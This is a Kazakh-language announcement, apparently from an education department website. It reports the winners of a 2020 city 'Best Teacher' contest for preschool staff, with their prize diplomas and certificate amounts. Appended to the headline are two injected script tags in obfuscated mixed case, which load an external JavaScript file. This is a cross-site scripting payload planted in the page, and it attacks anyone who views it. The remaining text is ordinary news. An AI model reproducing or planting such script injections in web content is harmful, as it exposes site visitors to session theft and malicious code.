«Үздік педагог» қалалық байқауы қорытындысы туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.05.2020

2020 жылдың  28-29 сәуір  күндері қашықтық режимінде мектепке дейінгі мекемелер педагогтарының арасында «Үздік  педагог» қалалық байқауы өтті. Байқауға мектепке дейінгі ұйымдардың 21 педагогы  қатысты.

Байқаудың мақсаты: педагог кәсібінің мәртебесін арттыру және кәсіби қызметте жоғары жетістіктері бар шығармашыл педагогтарды мадақтау.

 

 

Байқаудың қорытындысы:

Бас жүлдені №19 «Нұр бала» балабақшасының тифлопедагогы  Бекимова Наргуль Кактаевна  жеңіп алды. Педагог дипломмен және 100 000 теңгенің сертификатымен марапатталды.

 

1-орынды иеленген «Ю. Гагарин ат. №33» балабақшасының ағылшын тілі мұғалімі Суворкова Наталья Николаевна  І дәрежелі дипломмен және 80 000 теңгенің сертификатымен  марапатталды.

 

 2-орынды  №14 «Достық» балабақшасының тәрбиешісі Проскурякова Кира Владимировна  ІІ дәрежелі дипломмен және 60 000 теңгенің сертификатымен марапатталды.

 

3-орынға ие болған № 5 «Қуаныш» балабақшасының тәрбиешісі  Киребаева Гульнара Султанбековна ІІІ дәрежелі дипломмен және 40 000 теңгенің сертификатымен марапатталды.

 

 

Жеңімпаздарды құттықтап, алдағы уақытта мол шығармашылық табыстар тілейміз!

 

Просмотров: 1217


Пікір қосу



Деректерді қолтаңбаға қосу